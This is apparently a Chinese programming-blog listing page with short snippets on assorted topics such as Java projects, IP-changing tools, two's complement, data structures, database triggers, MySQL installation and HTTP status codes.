    作者主页:计算机毕业设计老哥有问题可以主页问我一、开发介绍1.1开发环境开发语言:Java数据库:MySQL系统架构:B/S后端:SSM(Spring+SpringMVC+Mybatis)前端:Vue工具:IDEA或者Eclipse,JDK1.8,Maven二、系统介绍2.1图片展示注册登录页面:登陆.png前端页面功能:首页、培训班、在线学习、企业文化、交流论坛、试卷列表、系统公告、留言反馈、个
  • 什么软件可以改IP地址 bafnpa123 服务器运维
    什么软件可以改IP地址在现代网络环境中,有时候我们需要更换IP地址来进行网络操作。IP地址是网络通信的基石,它标识了计算机在互联网上的唯一身份。下面,我将向您介绍几种常见的换IP地址的方法:方法一:使用深度ip转换器ip转换器是一种可以在公共网络上建立加密通道的技术。通过ip转换器,您可以更换您的IP地址,从而隐藏您的真实IP,提高网络安全性。在选择ip转换器服务时,请务必选择信誉良好、速度稳定的
  • 信息技术让教学插上翅膀 洮北591樊迪
    经过了一个暑期的听课,我清楚地认识到随着以计算机为核心的信息技术在教育中的广泛应用,教师不是像以前那样,单凭一张嘴、一支粉笔、一块黑板即可进行教学,而是综合应用多种媒体技术,利用多媒体和微机网络,开展教学。教师不能只停在原有知识的认识上,要不断学习,不断完善自己,不断充实自己。现在的学生更是聪明,他们不仅能在学校里学习知识,还能通过电视、网络等多种途径学到更多的知识。因而,教师必须有一种超前意识。
  • 二进制 补码 运算 starnight_cbj 计算机基础扩展
    负数在计算机中如何表示?举例来说,+8在计算机中表示为二进制的1000,那么-8怎么表示呢?很容易想到,可以将一个二进制位(bit)专门规定为符号位,它等于0时就表示正数,等于1时就表示负数。比如,在8位机中,规定每个字节的最高位为符号位。那么,+8就是00001000,而-8则是10001000。但是,随便找一本《计算机原理》,都会告诉你,实际上,计算机内部采用补码(Two'sComplemen
  • P5963 [BalticOI ?] Card 卡牌游戏 贪心 golemon. 算法题游戏算法
    [P5963BalticOI?]Card卡牌游戏【来源请求】-洛谷|计算机科学教育新生态(luogu.com.cn)贪心模板题。存在(x1,y1)(x_1,y_1)(x1,y1),(x2,y2)(x_2,y_2)(x2,y2),假设xi>yix_i>y_ixi>yi,显然得认为:−x1+y2-x_1+y_2−x1+y2是最优得的,那么有:−x1+y2≤−x2+y1-x_1+y_2\le-x_2+y
  • 【数据结构】复杂度计算 一只小鹿lu 数据结构
    1、时间复杂度1.1概念时间复杂度的定义:在计算机科学中,算法的时间复杂度是一个函数,它定量描述了该算法的运行时间。一个算法所花费的时间与其中语句的执行次数成正比例,算法中的基本操作的执行次数,为算法的时间复杂度。1.2大O的渐进表示法大O符号(BigOnotation):是用于描述函数渐进行为的数学符号。推导大O阶方法:1、用常数1取代运行时间中的所有加法常数。2、在修改后的运行次数函数中,只保
  • 2019-3-5晨间日记 龙梅_4c22
    今天是什么日子起床:7.15就寝:23天气:晴春风和煦心情:有点颓纪念日:等待妇女节任务清单昨日完成的任务,最重要的三件事:第一天起步改进:胆怯的心习惯养成:读书周目标·完成进度想做就做不后退不胆怯学习·信息·阅读多关注一点时事不做睁眼瞎健康·饮食·锻炼腰痛希望有跑步的习惯人际·家人·朋友不大不小的朋友圈工作·思考计算机二级英语四级驾驶证最美好的三件事1.跟妈妈视频2.为了未来努力3.再慢慢慢慢的
  • 分布式:这里详细的说一下分布式 独木人生 后端分布式
    分布式系统是由多台计算机节点协同工作的系统,节点之间通过网络进行通信和协调。每个节点可以独立执行任务,但它们共享资源和数据,相互之间通过消息传递进行通信。在分布式系统中,通信和协调是实现分布式的关键。节点之间可以通过消息传递、远程过程调用(RPC)、远程方法调用(RMI)等方式进行通信。为了保证节点的可靠性和容错性,通常会采用一致性协议、故障检测和容错机制等技术来处理节点故障和网络分区等问题。分布
  • 神经网络(深度学习,计算机视觉,得分函数,损失函数,前向传播,反向传播,激活函数) MarkHD 深度学习神经网络计算机视觉
    神经网络,特别是深度学习,在计算机视觉等领域有着广泛的应用。以下是关于你提到的几个关键概念的详细解释:神经网络:神经网络是一种模拟人脑神经元结构的计算模型,用于处理复杂的数据和模式识别任务。它由多个神经元(或称为节点)组成,这些神经元通过权重和偏置进行连接,并可以学习调整这些参数以优化性能。深度学习:深度学习是神经网络的一个子领域,主要关注于构建和训练深度神经网络(即具有多个隐藏层的神经网络)。通
  • 软件评测师写作专栏之指令流水线知识01 昊洋_写作的匠心
    各位学员大家好,相信大家在学习计算机系统构成及硬件基础知识时,感觉指令流水线这部分比较难,其实只要大家掌握了解题方法,很快就可以定位出正确答案,接下来就带领大家一起来学习一下!1、例题:某指令流水线由4段组成,各段所需的时间如下图所示。连续输入8条指令时的吞吐率(单位时间内流水线所完成的任务数或输出的结果数)为()?例题1A、8/56ΔtB、8/32ΔtC、8/28ΔtD、8/24Δt【昊洋详解】
  • 【创作纪念日】1024回忆录 风巽·剑染春水 创作纪念日1024
      不知不觉中,从创作第一篇文章到现在,已经1024天了,两年多的时间里,已经从硕士到博士了,1024,对于程序员来说,是个特别的数字吧,在此回忆与记录一下这些美好的经历吧。缘起  很早以前,我从来也没想过我会了解计算机,了解代码的世界,那时候少年心中的梦想是当一名医生,想要悬壶济世,想要治病救人。后来因为种种原因,我没能成为一名临床医学生,学习了生物医学工程专业。  这个专业说实话很杂,什么都学
  • 什么是特征检测和描述,OpenCV中常见的特征检测算法有哪些? -Max-静- #opencv学习opencv算法人工智能
    特征检测和描述是计算机视觉中的基本概念,它们在图像识别、对象跟踪、图像拼接等多种任务中发挥着至关重要的作用。特征检测是指识别图像中重要的特定点、区域或结构,这些特征通常具有独特性、可重复性以及对光照变化、旋转和比例变换等变化的鲁棒性。这些特征点可以用作进一步分析的参考。特征描述是基于一定的几何或者颜色信息生成特征点的特征描述符,这种描述应满足欧式空间的仿射不变性和噪声鲁棒性,并且不同特征点的特征描
  • 网络体系结构的形成 潜※者 网络
    目录计算机网络是一个非常复杂的系统,设想一个最简单的应用:连接在网络上的两台计算机应用QQ相互传送文件。显然,2台计算机之间要有一条传送数据的物理通路,除此之外,还必须要做很多工作:1.发送文件的计算机必须要将数据通路进行“激活”,也就是说要发出一些信息控制命令,保证要传送的数据能在这条数据通路上正确的发送和接收。2.要告诉网络如何识别接收数据的计算机,保证只有目的计算机才能接收到数据。3.发送文
  • 计算机网络的概念 潜※者 计算机网络
    目录1.第一阶段远程联机阶段----60年代以前:2.第二阶段多机互联网络阶段----60年代中期:3.第三阶段标准化网络阶段----70年代末:4.第四阶段网络互联与高速网络阶段一90年代:21世纪的重要特征就是数字化、网络化和信息化,是一个以网络为核心的信息时代。这里所说的网络就是指“三网”一-电信网络、有线电视网络和计算机网络。这三种网络向用户提供的服务不同:电信网向用户提供电话、电报、传真
  • 无法向会话状态服务器发出会话状态请求。请确保 ASP.NET State Service (ASP.NET 状态服务)已启动,并且客户端端口与服务器端口相同。如果服务器位于远程计算机上,请检查 ... Allen_f58e
    无法向会话状态服务器发出会话状态请求。请确保ASP.NETStateService(ASP.NET状态服务)已启动,并且客户端端口与服务器端口相同。如果服务器位于远程计算机上,请检查HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspnet_state\Parameters\AllowRemoteConnection的值,确保服务器接受远
  • Java学习笔记之Java基础语法01-变量与常量 神马都会亿点点的毛毛张 编程笔记编程实战java学习笔记
    文章目录0.前言1.注释1.1注释格式1.2使用的技巧2.关键字2.1概念2.2class关键字2.3保留字3.字面量3.1字面量种类3.2常用转义字符4.变量4.1变量定义4.2数据类型1.分类2.基本数据类型(四类八种)3.变量初始化细节4.3计算机中的数据存储4.4练习练习1练习2练习34.5标识符1.硬性要求:2.命名原则A.小驼峰命名法B.大驼峰命名法C.阿里巴巴命名规范细节:0.前言本
  • Java实现的简单双向Map,支持重复Value superlxw1234 java双向map
    关键字:Java双向Map、DualHashBidiMap     有个需求,需要根据即时修改Map结构中的Value值,比如,将Map中所有value=V1的记录改成value=V2,key保持不变。   数据量比较大,遍历Map性能太差,这就需要根据Value先找到Key,然后去修改。   即:既要根据Key找Value,又要根据Value
  • PL/SQL触发器基础及例子 百合不是茶 oracle数据库触发器PL/SQL编程
      触发器的简介; 触发器的定义就是说某个条件成立的时候,触发器里面所定义的语句就会被自动的执行。因此触发器不需要人为的去调用,也不能调用。触发器和过程函数类似 过程函数必须要调用,   一个表中最多只能有12个触发器类型的,触发器和过程函数相似 触发器不需要调用直接执行, 触发时间:指明触发器何时执行,该值可取: before:表示在数据库动作之前触发
  • [时空与探索]穿越时空的一些问题 comsci 问题
          我们还没有进行过任何数学形式上的证明,仅仅是一个猜想.....       这个猜想就是; 任何有质量的物体(哪怕只有一微克)都不可能穿越时空,该物体强行穿越时空的时候,物体的质量会与时空粒子产生反应,物体会变成暗物质,也就是说,任何物体穿越时空会变成暗物质..(暗物质就我的理
  • easy ui datagrid上移下移一行 商人shang js上移下移easyuidatagrid
    /** * 向上移动一行 * * @param dg * @param row */ function moveupRow(dg, row) { var datagrid = $(dg); var index = datagrid.datagrid("getRowIndex", row); if (isFirstRow(dg, row)) {
  • Java反射 oloz 反射
    本人菜鸟,今天恰好有时间,写写博客,总结复习一下java反射方面的知识,欢迎大家探讨交流学习指教 首先看看java中的Class package demo; public class ClassTest { /*先了解java中的Class*/ public static void main(String[] args) { //任何一个类都
  • springMVC 使用JSR-303 Validation验证 杨白白 springmvc
    JSR-303是一个数据验证的规范,但是spring并没有对其进行实现,Hibernate Validator是实现了这一规范的,通过此这个实现来讲SpringMVC对JSR-303的支持。 JSR-303的校验是基于注解的,首先要把这些注解标记在需要验证的实体类的属性上或是其对应的get方法上。 登录需要验证类 public class Login { @NotEmpty
  • log4j 香水浓 log4j
    log4j.rootCategory=DEBUG, STDOUT, DAILYFILE, HTML, DATABASE #log4j.rootCategory=DEBUG, STDOUT, DAILYFILE, ROLLINGFILE, HTML #console log4j.appender.STDOUT=org.apache.log4j.ConsoleAppender log4
  • 使用ajax和history.pushState无刷新改变页面URL agevs jquery框架Ajaxhtml5chrome
    表现 如果你使用chrome或者firefox等浏览器访问本博客、github.com、plus.google.com等网站时,细心的你会发现页面之间的点击是通过ajax异步请求的,同时页面的URL发生了了改变。并且能够很好的支持浏览器前进和后退。 是什么有这么强大的功能呢? HTML5里引用了新的API,history.pushState和history.replaceState,就是通过
  • centos中文乱码 AILIKES centosOSssh
    一、CentOS系统访问 g.cn ,发现中文乱码。 于是用以前的方式:yum -y install fonts-chinese CentOS系统安装后,还是不能显示中文字体。我使用 gedit 编辑源码,其中文注释也为乱码。       后来,终于找到以下方法可以解决,需要两个中文支持的包: fonts-chinese-3.02-12.
  • 触发器 baalwolf 触发器
    触发器(trigger):监视某种情况,并触发某种操作。 触发器创建语法四要素:1.监视地点(table) 2.监视事件(insert/update/delete) 3.触发时间(after/before) 4.触发事件(insert/update/delete) 语法: create trigger triggerName after/before 
  • JS正则表达式的i m g bijian1013 JavaScript正则表达式
            g:表示全局(global)模式,即模式将被应用于所有字符串,而非在发现第一个匹配项时立即停止。         i:表示不区分大小写(case-insensitive)模式,即在确定匹配项时忽略模式与字符串的大小写。         m:表示
  • HTML5模式和Hashbang模式 bijian1013 JavaScriptAngularJSHashbang模式HTML5模式
            我们可以用$locationProvider来配置$location服务(可以采用注入的方式,就像AngularJS中其他所有东西一样)。这里provider的两个参数很有意思,介绍如下。 html5Mode         一个布尔值,标识$location服务是否运行在HTML5模式下。 ha
  • [Maven学习笔记六]Maven生命周期 bit1129 maven
    从mvn test的输出开始说起   当我们在user-core中执行mvn test时,执行的输出如下:   /software/devsoftware/jdk1.7.0_55/bin/java -Dmaven.home=/software/devsoftware/apache-maven-3.2.1 -Dclassworlds.conf=/software/devs
  • 【Hadoop七】基于Yarn的Hadoop Map Reduce容错 bit1129 hadoop
    运行于Yarn的Map Reduce作业,可能发生失败的点包括 Task Failure Application Master Failure Node Manager Failure Resource Manager Failure 1. Task Failure 任务执行过程中产生的异常和JVM的意外终止会汇报给Application Master。僵死的任务也会被A
  • 记一次数据推送的异常解决端口解决 ronin47 记一次数据推送的异常解决
       需求:从db获取数据然后推送到B         程序开发完成,上jboss,刚开始报了很多错,逐一解决,可最后显示连接不到数据库。机房的同事说可以ping 通。     自已画了个图,逐一排除,把linux 防火墙 和 setenforce 设置最低。    service iptables stop
  • 巧用视错觉-UI更有趣 brotherlamp UIui视频ui教程ui自学ui资料
    我们每个人在生活中都曾感受过视错觉(optical illusion)的魅力。 视错觉现象是双眼跟我们开的一个玩笑,而我们往往还心甘情愿地接受我们看到的假象。其实不止如此,视觉错现象的背后还有一个重要的科学原理——格式塔原理。 格式塔原理解释了人们如何以视觉方式感觉物体,以及图像的结构,视角,大小等要素是如何影响我们的视觉的。 在下面这篇文章中,我们首先会简单介绍一下格式塔原理中的基本概念,
  • 线段树-poj1177-N个矩形求边长(离散化+扫描线) bylijinnan 数据结构算法线段树
    package com.ljn.base; import java.util.Arrays; import java.util.Comparator; import java.util.Set; import java.util.TreeSet; /** * POJ 1177 (线段树+离散化+扫描线),题目链接为http://poj.org/problem?id=1177
  • HTTP协议详解 chicony http协议
    引言                                 
  • Scala设计模式 chenchao051 设计模式scala
    Scala设计模式                我的话: 在国外网站上看到一篇文章,里面详细描述了很多设计模式,并且用Java及Scala两种语言描述,清晰的让我们看到各种常规的设计模式,在Scala中是如何在语言特性层面直接支持的。基于文章很nice,我利用今天的空闲时间将其翻译,希望大家能一起学习,讨论。翻译
  • 安装mysql daizj mysql安装
    安装mysql   (1)删除linux上已经安装的mysql相关库信息。rpm  -e  xxxxxxx   --nodeps (强制删除)      执行命令rpm -qa |grep mysql 检查是否删除干净   (2)执行命令  rpm -i MySQL-server-5.5.31-2.el
  • HTTP状态码大全 dcj3sjt126com http状态码
    完整的 HTTP 1.1规范说明书来自于RFC 2616,你可以在http://www.talentdigger.cn/home/link.php?url=d3d3LnJmYy1lZGl0b3Iub3JnLw%3D%3D在线查阅。HTTP 1.1的状态码被标记为新特性,因为许多浏览器只支持 HTTP 1.0。你应只把状态码发送给支持 HTTP 1.1的客户端,支持协议版本可以通过调用request
  • asihttprequest上传图片 dcj3sjt126com ASIHTTPRequest
    NSURL *url =@"yourURL"; ASIFormDataRequest*currentRequest =[ASIFormDataRequest requestWithURL:url]; [currentRequest setPostFormat:ASIMultipartFormDataPostFormat];[currentRequest se
  • C语言中,关键字static的作用 e200702084 C++cC#
    在C语言中,关键字static有三个明显的作用: 1)在函数体,局部的static变量。生存期为程序的整个生命周期,(它存活多长时间);作用域却在函数体内(它在什么地方能被访问(空间))。 一个被声明为静态的变量在这一函数被调用过程中维持其值不变。因为它分配在静态存储区,函数调用结束后并不释放单元,但是在其它的作用域的无法访问。当再次调用这个函数时,这个局部的静态变量还存活,而且用在它的访
  • win7/8使用curl geeksun win7
    1.  WIN7/8下要使用curl,需要下载curl-7.20.0-win64-ssl-sspi.zip和Win64OpenSSL_Light-1_0_2d.exe。 下载地址:  http://curl.haxx.se/download.html 请选择不带SSL的版本,否则还需要安装SSL的支持包   2.  可以给Windows增加c
  • Creating a Shared Repository; Users Sharing The Repository hongtoushizi git
    转载自:   http://www.gitguys.com/topics/creating-a-shared-repository-users-sharing-the-repository/ Commands discussed in this section: git init –bare git clone git remote git pull git p
  • Java实现字符串反转的8种或9种方法 Josh_Persistence 异或反转递归反转二分交换反转java字符串反转栈反转
    注:对于第7种使用异或的方式来实现字符串的反转,如果不太看得明白的,可以参照另一篇博客: http://josh-persistence.iteye.com/blog/2205768   /** * */ package com.wsheng.aggregator.algorithm.string; import java.util.Stack; /**
  • 代码实现任意容量倒水问题 home198979 PHP算法倒水
    形象化设计模式实战             HELLO!架构                     redis命令源码解析   倒水问题:有两个杯子,一个A升,一个B升,水有无限多,现要求利用这两杯子装C
  • Druid datasource zhb8015 druid
    推荐大家使用数据库连接池 DruidDataSource. http://code.alibabatech.com/wiki/display/Druid/DruidDataSource DruidDataSource经过阿里巴巴数百个应用一年多生产环境运行验证,稳定可靠。 它最重要的特点是:监控、扩展和性能。 下载和Maven配置看这里: http
  • 两种启动监听器ApplicationListener和ServletContextListener spjich javaspring框架
    引言:有时候需要在项目初始化的时候进行一系列工作,比如初始化一个线程池,初始化配置文件,初始化缓存等等,这时候就需要用到启动监听器,下面分别介绍一下两种常用的项目启动监听器   ServletContextListener  特点: 依赖于sevlet容器,需要配置web.xml 使用方法: public class StartListener implements
  • JavaScript Rounding Methods of the Math object 何不笑 JavaScriptMath
        The next group of methods has to do with rounding decimal values into integers. Three methods — Math.ceil(),  Math.floor(), and  Math.round() — handle rounding in differen
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他